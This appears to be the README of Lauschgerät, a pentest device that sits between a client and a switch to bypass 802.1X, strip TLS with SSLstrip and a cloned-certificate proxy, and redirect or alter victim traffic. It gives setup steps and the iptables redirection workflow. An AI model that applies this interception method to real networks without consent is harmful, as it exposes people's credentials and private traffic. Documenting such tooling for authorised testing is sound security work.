Analyze and modify traffic without worrying about TLS or 802.1X.
Lauschgerät attempts to do most of the heavy lifting so you can focus on things that cannot be done by a machine. Get an extra ethernet cable, plug your machine between two test machines, and watch and control the traffic flowing through your machine.
The recommended distribution is either Debian Stretch or newer or Kali Linux (even on ARM). A minimal network install with just an SSH server and standard Linux tools will do.
Install the requirements:
cat requirements-system.txt | xargs sudo apt-get -y install
pip3 install --user -r requirements.txt
- Create a virtual machine with a network interface you can reach from your host machine (host-only if using KVM) and set up an SSH service
- Boot the device before plugging in any extra network interfaces
- Log in and make sure you can reach the internet
- Write down the name of the wireless interface, if there is any
- Now plug in the switch interface and write down the name of the new device
that shows up in the output of
ip link - Now plug in the client interface and write down the name of the new device
- Run:
install.sh -u=root -p=<PORT> <HOST> <ATIF> <CLIF> <SWIF>The arguments correspond to the attacker interface, the client interface and the switch interface. - If something goes wrong, log in and try to fix it, then run the command again
Download a suitable ISO, install it on a Raspberry Pi, Banana Pi or some
other compatible device. This has been tested with
2018-04-18-raspbian-stretch-lite.img (SHA1 sum
a85ca45b0830bfa3196786061c524d93325596c0).
To make sure you got root access via SSH and that the device has internet access, I recommend mounting the iso first with guestfish to enable SSH:
$ guestfish -a 2018-04-18-raspbian-stretch-lite.img
Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.
Type: ‘help’ for help on commands
‘man’ to read the manual
‘quit’ to quit the shell
><fs> run
><fs> mount /dev/sda2 /
Then create a symlink to enable the SSH service at boot:
ln-s /lib/systemd/system/ssh.service /etc/systemd/system/sshd.service
Then umount /, sync and exit. Copy it to an SD card, boot the
Raspberry Pi and proceed as in variant 2.
This is a good moment to get coffee, because this step may take a while.
It should then look like this:
- Attach the victim client and the victim switch to the Lauschgerät
- If using variant 1 (network namespaces), run
lauschgeraet.py <client-interface> <switch-interface> - Navigate a browser to the attacker machine on port 1337
- Set the status of the Lauschgerät to
passiveby clicking the On/Off switch - Watch the traffic with
ip netns exec lg tcpdump -i br0, or remotely with Wireshark:ssh root@lauschgeraet ip netns exec lg tcpdump -s 0 -U -n -w - -i br0 | wireshark -k -i - - To redirect traffic to another service, set the status of the Lauschgerät
to
active - Run a service on the target port using the "Services" page
- Define an
iptablesrule on the "Man in the Middle" page that redirects traffic to that target port
You can run arbitray services on the Lauschgerät to interact with your victim's traffic. Currently, you need to supply a JSON file with some basic info in order to conviently run these services from the web interface. A proper API is planned for the next release. You're always free to start any service manually via SSH, of course.
A few examples are listed in the following section.
By default, Lauschgerät comes with JSON files for Moxie Marlinspike's SSLstrip, a self-developed TCP proxy called TLS Eraser and, as an example for how an adversary could maliciously modify traffic, Flipper, a service that turns images transferred via HTTP upside-down.
The Lauschgerät has the IP address 203.0.113.1 in lg network namespace and
203.0.113.2 in the default network namespace.
By default, TLS Eraser runs on TCP port 1234. It terminates the TLS encryption and redirects the traffic to another network namespace before transmitting it to its original destination. The original destination is determined automatically. The detour to another namespace is made so you can observe the unencrypted traffic via Wireshark or tcpdump.
The certificate which is presented to the victim is obtained via clone-cert.sh.
Run the Flipper service (analogous to TLS Eraser) to flip images:
Shout out to byt3bl33d3r!
Hidden Services
In case you want to run a service that is accessible to other members of the network, define a MitM rule such as this:
old destination new destination
<IP of the victim client>:80 -> 203.0.113.1:80
When running the Lauschgerät as variant 3 with dedicated hardware such as a Raspberry Pi, you can use the built-in wifi card either as a management interface or as another client interface. Simply turn on the Lauschgerät's wifi mode in the web interface. Then all traffic originating from wireless devices which joined the wifi network will be intercepted.
If you want to contribute, it's useful to have a good test setup. Since it's a pain to work with another physical device, let alone two more devices, let's just use the same machine we're already working on (variant 1). The trick is to use yet another network namespace.
The script testsetup.sh creates a network namespace with the name ext as
well as four virtual devices:
lg-eth0- replaces the the interface on the attacker machine connected to the clientlg-eth1- replaces the the interface on the attacker machine connected to the switchlg-eth0-l- replaces the interface of the victim clientlg-eth1-l- replaces the interface of the victim switch
lg-eth0-l is assigned to the network namespace ext by the script. There
needs to be a DHCP service listening on lg-eth1-l. It can be in the
default network namespace.
To run a test, execute ./testsetup.sh ; ./lauschgeraet.py -ci lg-eth0 -si lg-eth1. Now switch into the ext namespace with something like sudo ip netns exec ext bash. Pretend to be the victim by placing requests from this
shell, preferably with curl or wget, but you can also launch a browser.
Close all shells living in this new network namespace before you delete it.
Large parts of the 802.1x bypass have been taken from Alva Duckwall's excellent talk.
- Silentbridge: https://github.com/s0lst1c3/silentbridge
- PhanTap: https://github.com/nccgroup/phantap
- Dolos Cloak
Adrian Vollmer, SySS GmbH 2018-2019
Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.